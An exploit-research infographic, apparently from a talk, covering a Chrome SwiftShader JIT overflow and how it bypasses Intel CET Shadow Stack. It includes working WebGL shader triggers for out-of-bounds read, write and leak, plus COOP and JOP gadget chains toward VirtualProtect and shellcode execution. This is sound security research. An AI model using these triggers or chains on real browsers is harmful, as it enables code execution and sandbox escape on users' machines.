Bypassing Intel CET Shadow Stack

An infographic detailing the CVE-2023-3598 "SwiftZero" Chrome sandbox escape which bypasses Intel CET Shadow Stack on Windows x64.

Intel CET ShadowStack

A Hardware Defense

Intel's Control-flow Enforcement Technology (CET) is a hardware-level defense. Its key feature for this talk is the Shadow Stack, a CPU-protected stack that creates a secure record of return addresses to prevent backward-edge control flow attacks.

The Audit

On every function return, the CPU compares the return address on the normal stack with the one on the Shadow Stack. If they mismatch, it triggers a hardware fault, terminating the process. This is designed to make return-oriented programming (ROP) attacks impossible.

Normal Function Call with CET

1. Example Code


void foo() { ... }

void main() {
  foo(); // <-- CALL
  // <-- return addr is here
}

2. Resulting Stacks

Call Stack
...
return addr
foo() stack frame
Shadow Stack
...
return addr

The call instruction pushes the return address to both stacks simultaneously.

3. When Return Addresses Mismatch

Call Stack
...
corrupted addr
foo() stack frame
Shadow Stack
...
real return addr

#CP Fault: Process Terminated

CPU detects mismatch during RET instruction and triggers a hardware fault.

How CET Defeats ROP

1. ROP Gadget

pop rcx
ret

A typical gadget found in legitimate code.

2. How ROP Fails

Call Stack
ROP gadget addr
ROP gadget addr
value for RCX
Shadow Stack
...
legitimate Addr

MISMATCH: #CP Fault on ret

How CET Hinders JOP

1. JOP Gadget

mov rcx, [rbx]
jmp rcx ; <-- VirtualProtect

A gadget to perform an action and jump.

2. How JOP Can Fail

Hijacks control to a JOP gadget

JOP gadget jumps to VirtualProtect

VirtualProtect finishes and executes ret

Shadow Stack still expects the original return address.

MISMATCH: #CP Fault on ret

How CET Hinders COP

1. COP Gadget

; COP gadget found in real code
mov rdx, [rax+0x20]    ; Load VirtualProtect addr
call rdx               ; Call VirtualProtect - SUCCESS!
mov rbx, [rax+0x30]    ; ← VirtualProtect returns HERE
add rsp, 0x28          ; Unwanted stack manipulation
pop r14                ; Destroys register state

Real gadgets have problematic instructions that destroy control flow.

2. How COP Can Fail

Attacker controls [rax+0x20] = &VirtualProtect

call rdx → VirtualProtect()

Shadow Stack: must return to line 4

VirtualProtect() executes & returns

Returns to line 4 (unwanted!)

Stack manipulation destroys control

add rsp, 0x28; pop r14

Control flow completely lost

COP can call one function, but can't skip the destructive instructions that follow.

The Road to CET

2016
Intel Publishes CET Specs

The initial specification is released to give the software ecosystem time to prepare.

2020
Hardware & OS Support Arrives

Intel releases 11th Gen "Tiger Lake" CPUs with CET. Microsoft enables "Hardware-enforced Stack Protection" in Windows 10 (20H1).

2021
Browser Adoption Begins

Google starts enabling CET support for Chrome 90.

2022
Protection Extends to the Core

Microsoft introduces Kernel-mode Hardware-enforced Stack Protection in Windows 11 (22H2).

CET's deployment was a multi-year collaboration between hardware, OS, and application vendors.

Windows' Compatibility Mode

Windows doesn't just turn CET on. It uses a flexible system called "Hardware-enforced Stack Protection" (HSP) system. This compatibility mode introduces specific rules that an attacker can potentially exploit.

Kernel Fault Investigation Logic

#CP Fault Triggered

CPU detects mismatch

Kernel Investigates

KiControlProtectionFault

ALLOW Cases

Return address found on ShadowStack?

ALLOW

Legitimate return

Return from non-CETCOMPAT dynamic code?

ALLOW

JIT/interpreted code exemption

Return from non-CETCOMPAT module?

ALLOW

Legacy compatibility

TERMINATE Cases

Return from CETCOMPAT code without valid ShadowStack entry?

TERMINATE

CET violation detected

Return from CETCOMPAT module with mismatch?

TERMINATE

CET violation detected

Key Insight

The kernel's compatibility exemptions for non-CETCOMPAT dynamic code (like JIT-compiled shaders) create a bypass opportunity. SwiftShader's JIT code is exempt from CET enforcement, allowing our exploit to work.

The SwiftZero Bug (CVE-2023-3598)

The vulnerability (CVE-2023-3598) lies within SwiftShader's JIT compiler. A 32-bit integer overflow when calculating stack space for large shader variables leads to a classic stack-based buffer overflow.

Learn more

The Vulnerable Code: Cfg::sortAndCombineAllocas

void Cfg::sortAndCombineAllocas(CfgVector<InstAlloca *> &Allocas,
                                uint32_t CombinedAlignment, InstList &Insts,
                                AllocaBaseVariableType BaseVariableType) {
  if (Allocas.empty())
    return;
    ...
  uint32_t CurrentOffset = 0;  // 32-bit integer can overflow!
  CfgVector<int32_t> Offsets;
  
  // The vulnerable loop:
  for (Inst *Instr : Allocas) {
    auto *Alloca = llvm::cast<InstAlloca>(Instr);
    uint32_t Alignment = std::max(Alloca->getAlignInBytes(), 1u);
    auto *ConstSize = 
        llvm::dyn_cast<ConstantInteger32>(Alloca->getSizeInBytes());
    // Size can be controlled by attacker via shader code
    uint32_t Size = Utils::applyAlignment(ConstSize->getValue(), Alignment);
    
    ...
    Offsets.push_back(...);
    CurrentOffset += Size;  // INTEGER OVERFLOW HERE!
  }
  
  // Round the offset up to the alignment to determine the final allocation size
  uint32_t TotalSize = Utils::applyAlignment(CurrentOffset, CombinedAlignment);
  ...
}

Line 7: CurrentOffset is a 32-bit unsigned integer that can overflow

Line 17: Size can be controlled by attacker via shader code

Line 21: Integer overflow occurs here when CurrentOffset wraps around

Lines 25: The overflowed value leads to an undersized allocation

You can craft shader variables large enough to cause CurrentOffset to wrap around, resulting in an undersized stack frame allocation.

View the full source code on GitHub

Compiling a Shader

(() => {
    // Create a temporary canvas to get a WebGL2 context
    const canvas = document.createElement('canvas');
    const gl = canvas.getContext('webgl2');

    if (!gl) {
        console.error("WebGL 2 is not available on your browser.");
        return;
    }

    // A simple, valid vertex shader
    const vsSource = `
        #version 300 es
        mat4 buf[0xffffff]; // Trigger the overflow in sortAndCombineAllocas
        void main() {
            buf[1][2][3]=uintBitsToFloat(0x41414141);
    }`;

    // --- The Compilation Process ---
    const shader = gl.createShader(gl.VERTEX_SHADER);
    gl.shaderSource(shader, vsSource);
    gl.compileShader(shader);

    // --- Check the Result ---
    if (gl.getShaderParameter(shader, gl.COMPILE_STATUS)) {
        console.log("Shader compiled successfully!");
    } else {
        console.error("Shader compilation failed:");
        console.error(gl.getShaderInfoLog(shader));
    }
})();

Client-Side Shader Compilation via WebGL2 using JavaScript

Line 14: Large array triggers integer overflow

Memory Corruption: Out-of-Bounds Write

1. Shader Code


#version 300 es
// Trigger integer overflow in sortAndCombineAllocas
mat4 buf[0xffffff];
void main() {
  // These writes go out of bounds
  buf[1][2][3]=uintBitsToFloat(0x41414141);
}

Line 4: Large array triggers integer overflow

Line 7: Out-of-bounds write overwrites return address

2. Result: Memory Corruption

Memory Layout
Target: 0x4141414141414141 (return addr)
...writable memory in between...
Array bounds end here
buf[0xffffff]

Reading past array bounds exposes sensitive stack data like the return addresses.

Information Disclosure: Out-of-Bounds Read

1. Shader Code


#version 300 es
// Trigger integer overflow in sortAndCombineAllocas
mat4 buf[0xfffffff];
flat out uint returnAddr;
void main() {
    // These reads go out of bounds
    returnAddr = floatBitsToUint(buf[1][2][3]);
}

Line 4: Large array triggers integer overflow

Line 8: Out-of-bounds read leaks return address

2. Result: Memory Disclosure

Memory Layout
Target: 0x7fff12345678 (return addr)
...readable memory in between...
Array bounds end here
buf[0xffffff]

Reading past array bounds exposes sensitive stack data like the return addresses.

Allocation and Leak Primitive

1. Shader Code


#version 300 es
mat4 buf[0xffffff];
flat out uint value;
layout(std140) uniform Buffer {
    uint value[0x100];
} buffer;
uint extra[0x10];

void main() {
    // Read and write operations to
    // avoid compiler optimizations
    buf[0][0][0] = uintBitsToFloat(buffer.value[0x1]);
    extra[0] = floatBitsToUint(buf[0][0][0]);
    buf[0][0][1] = uintBitsToFloat(extra[0]);
    // Leak the address of the Uniform Buffer Object
    value = floatBitsToUint(buf[0][2][2]);
}

Line 3: Large array triggers integer overflow

Line 13-15: Forces allocation of GlUniformBufferObject

Line 17: Leaks address of the Uniform Buffer Object

2. Result: Controlled Allocation

Memory Layout
Target: 0x23adfe0b100 (UBO addr)
...allocated memory in between...
Array bounds end here
buf[0xffffff]

The shader forces allocation of a GlUniformBufferObject and leaks its address for precise memory layout control.

The Exploitation Challenge

What We Have
  • Read Primitive: Can leak stack addresses
  • Write Primitive: Can write values to the stack
  • Allocation Control: Can allocate data at known locations with controlled data
  • IP Control: Can hijack the instruction pointer
What's Blocking Us
  • CET defeats ROP: Shadow Stack validates returns
  • CET hinders JOP: Jumping to code that still needs to return
  • CET hinders COP: Difficult to maintain control of IP
  • Need a new approach...

So what can we do?

We need a technique that:

  • 1. Uses legitimate function calls
  • 2. Leverages existing code
  • 3. Works within CET's rules

Counterfeit Object-Oriented Programming

COOP: A code reuse attack targeting C++ applications, introduced by Felix Schuster in 2015.

Read the paper

C++ Classes: With vs Without Virtual Functions

1. Regular Class (No Virtuals)

class SimpleTimer {
    uint64_t deadline;
    bool active;
public:
    void Stop() { active = false; }  // Direct call
    void Run() { /* execute */ }     // Direct call
};

SimpleTimer* timer = new SimpleTimer();
timer->Stop();  // Direct function call

Lines 5-6: Regular functions use direct calls

SimpleTimer Object
0x00:deadline
0x08:active

No vtable pointer - just data members

2. Class with Virtual Functions

class Timer {
    void* vtable_ptr;  // Hidden, compiler-added
    uint64_t deadline;
public:
    virtual void Stop() { ... }  // Indirect call
    virtual void Run() { ... }   // Indirect call
};

Timer* timer = new Timer();
timer->Run();  // Virtual call through vtable

Lines 5-6: Virtual functions require vtable lookup

Timer Object
0x00:vtable_ptr
0x08:deadline
VTable
0x00:&Stop
0x08:&Run

Hidden vtable pointer added as first member

Key Difference: Function Call Assembly

Regular Function Call

call SimpleTimer::Stop  ; Direct call to known address

Virtual Function Call

mov rax, [rcx]       ; Load vtable pointer
call [rax+0x8]      ; Indirect call through vtable

Virtual functions enable polymorphism but introduce indirection that COOP exploits

The COOP Attack Principle

Counterfeit Objects Replace Real Ones

1. Control Object Layout

Attacker creates fake objects with controlled vtable pointers

Fake Timer Object
0x00:&FakeTimerVtable
0x08:data...
FakeTimerVtable
0x00:&VirtualProtect
0x08:&Shellcode

2. Hijack Virtual Calls

Virtual function calls become attacker-controlled indirect calls

; timer->Stop() becomes:
mov rax, [rcx]       ; Load fake vtable
call [rax+0x00]      ; Calls VirtualProtect!

; timer->Run() becomes:
call [rax+0x08]      ; Executes shellcode!

3. Chain Functions

Chain existing functions together to achieve arbitrary behavior

// Original code path:
timer->Stop();  // 1. VirtualProtect
timer->Run();   // 2. Shellcode

// Result: Memory made executable,
// then shellcode runs

COOP bypasses CFI by using legitimate virtual call sites with counterfeit objects.

Finding the Perfect COOP Gadget

Requirements for Our Virtual Call Site

1. Make Memory Executable (GlUniformBufferObject)

First virtual call must be redirectable to VirtualProtect

2. Execute Our Code

Second virtual call must call our shellcode

The Perfect Target: DeadlineTimer::OnScheduledTaskInvoked

void DeadlineTimer::OnScheduledTaskInvoked() {
  DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_);
  DCHECK(!delayed_task_handle_.IsValid());

  // Make a local copy of the task to run. The Stop method will reset the
  // |user_task_| member.
  OnceClosure task = std::move(user_task_);
  Stop();                  // Virtual call #1 - Perfect for VirtualProtect
  std::move(task).Run();   // Virtual call #2 - Perfect for shellcode execution
}

Line 8: First virtual call - we'll hijack this to call VirtualProtect

Line 9: Second virtual call - we'll hijack this to execute our shellcode

Two sequential virtual calls with controlled object = perfect COOP gadget

View the full source code on Chromium

Disassembly Analysis: How The COOP Gadget Works

; DeadlineTimer::OnScheduledTaskInvoked()
; RCX = `this` pointer 
; (points to our FakeDeadlineTimer object)
push rsi
sub rsp, 20

; --- Part 1: Move the task object (std::move(user_task_)) ---
mov rax, [rcx]                       ; Load vtable pointer from our fake object
mov rsi, [rcx+0x48]                  ; Load 'user_task_' pointer (points to our payload)
mov [rcx+0x48], 0                    ; Zero out the pointer

; --- Part 2: Call Stop()            -> Hijacked to call VirtualProtect ---
mov rax, [rax+0x10]                  ; Load function pointer from fake vtable offset 0x10
                                     ; We placed &VirtualProtect here
call __guard_dispatch_icall_fptr
                                     ; CFG allows this - VirtualProtect is a valid target!
                                     ; Makes our shellcode executable

; --- Part 3: Call Run()             -> Hijacked to execute shellcode ---
mov rax, [rsi+8]                     ; Load &Payload from our counterfeit object

mov rcx, rsi                         ; Set 'this' pointer for the call
call __guard_dispatch_icall_fptr     ; Executes our shellcode

; --- Cleanup ---
test rsi, rsi
jne chrome.0x7~
add rsp, 0x20
pop rsi
ret

Line 8: Loads our controlled vtable pointer

Line 9: Loads user_task_ which points to our payload

Line 13: Loads VirtualProtect from our fake vtable

Line 13: Calls VirtualProtect

Line 20: Loads &Shellcode from our fake vtable

Line 23: Second hijacked call - calls our shellcode

Why This COOP Gadget is Perfect

  • • Two virtual calls in sequence - exactly what we need
  • • No validation between calls - both execute unconditionally
  • • CFG allows VirtualProtect as a valid call target
  • • The object pointer (RCX) is preserved between calls
  • • Common function in Chrome - likely to be present

Counterfeit Object Layout

FakeDeadlineTimer
0x00:&FakeVtable
0x08:padding
......
0x48:&FakeDeadlineTimer+0x50
0x50:0x0000000000000000
0x58:&Shellcode
0x60:Shellcode bytes...

Counterfeit object in GlUniformBuffer

FakeVtable
0x00:unused
0x08:unused
0x10:&VirtualProtect
0x18:unused

Stop() → VirtualProtect

Payload Structure
0x00:0x0000000000000000
0x08:&Shellcode

Run() → Shellcode

The object's user_task_ member (offset 0x48) points to offset 0x50, creating a self-referential structure that satisfies the COOP gadget's requirements.

Finding JOP Gadgets for Argument Setup

The Challenge: Setting VirtualProtect Arguments

VirtualProtect requires specific arguments in Windows x64 calling convention:

VirtualProtect Parameters
BOOL VirtualProtect(
  RCX: LPVOID lpAddress,      // Our fake object
  RDX: SIZE_T dwSize,         // Size to protect
  R8:  DWORD flNewProtect,    // PAGE_EXECUTE_READWRITE
  R9:  PDWORD lpflOldProtect  // Output buffer
);
What We Need
  • • RCX → Address of our counterfeit object
  • • RDX → Size (e.g., 0x1000)
  • • R8 → 0x40 (PAGE_EXECUTE_READWRITE)
  • • R9 → Valid writable address
  • • Then jump to our COOP gadget

The Perfect JOP Chain

What we wish could have found
pop rdx       ; Pop value for dwSize (0x1000)
pop r8        ; Pop value for flNewProtect (0x40 = PAGE_EXECUTE_READWRITE)
pop r9        ; Pop value for lpflOldProtect (writable address)
pop rcx       ; Pop pointer to our FakeDeadlineTimerObject
pop rax       ; Pop address of DeadlineTimer::OnScheduledTaskInvoked
jmp rax       ; Jump to our COOP gadget

Lines 1-4: Set up all arguments for VirtualProtect

Line 6: Transfer control to our COOP gadget

Example Stack Layout for this

0x1000 (dwSize)
0x40 (PAGE_EXECUTE_READWRITE)
&OldProtect (writable addr)
&FakeDeadlineTimer
&OnScheduledTaskInvoked
...

Stack is prepared with all arguments before jumping to JOP gadget


The Full Exploit Chain

With control over the instruction pointer but facing modern defenses, the exploit uses a multi-stage process to achieve code execution.

Stage 1: First, We Craft Our Fake Object

Using our bug primitives, we allocate a glUniform buffer and craft a counterfeit `DeadlineTimer` object inside it. We control its entire layout.

FakeDeadlineTimer
0x00:&FakeVtable
0x08:padding
......
0x48:&FakeDeadlineTimer+0x50
0x50:0x0000000000000000
0x58:&Shellcode
0x60:Shellcode bytes...

Counterfeit object in GlUniformBuffer

FakeVtable
0x00:unused
0x08:unused
0x10:&VirtualProtect
0x18:unused

Stop() → VirtualProtect

Payload Structure
0x00:0x0000000000000000
0x08:&Shellcode

Run() → Shellcode

The object's user_task_ member (offset 0x48) points to offset 0x50, creating a self-referential structure that satisfies the COOP gadget's requirements.

Stage 2: Stack Setup & Initial Control

Before triggering the final return, we use the bug's primitives to prepare the stack

Leak Object Address The counterfeit object's memory location is discovered using the read primitive
Populate JOP Chain Stack is carefully filled with gadget addresses for argument setup using the write primitive
Hijack Return Address The saved RIP is overwritten to point to our JOP chain start
The Shader finishes and executes the RET instruction

Stage 3: CET Bypass

The kernel's compatibility logic checks the return. Since the shader is non-CETCOMPAT dynamic code, the return is ALLOWED.

Shadow Stack is bypassed. RIP now points to our JOP chain.

Stage 4: Argument Engineering

A "call-less" JOP chain executes, loading registers with arguments for `VirtualProtect` and placing a pointer to our Counterfeit Object into `RCX`.

pop rdx       ; Pop value for dwSize
pop r8        ; Pop value for flNewProtect
pop r9        ; Pop value for lpflOldProtect
pop rcx       ; Pop pointer to our FakeDeadlineTimerObject
pop rax       ; Pop address for the next jump target
jmp rax       ; Jump to DeadlineTimer::OnScheduledTaskInvoked

This perfect gadget sets all arguments for VirtualProtect then jumps to our target function.

Stage 5: Counterfeit Object Execution

void DeadlineTimer::OnScheduledTaskInvoked() {
  
    // Move our user_task_ obj
    OnceClosure task = std::move(user_task_);

    // &VirtualProtect
    Stop();

    // &Shellcode
    std::move(task).Run();
}

Line 3: Stop() hijacked to call VirtualProtect

Line 4: Run() hijacked to execute shellcode

Stage 6: LPE

The shellcode will trigger LPE and will be downloaded and executed by the GPU process.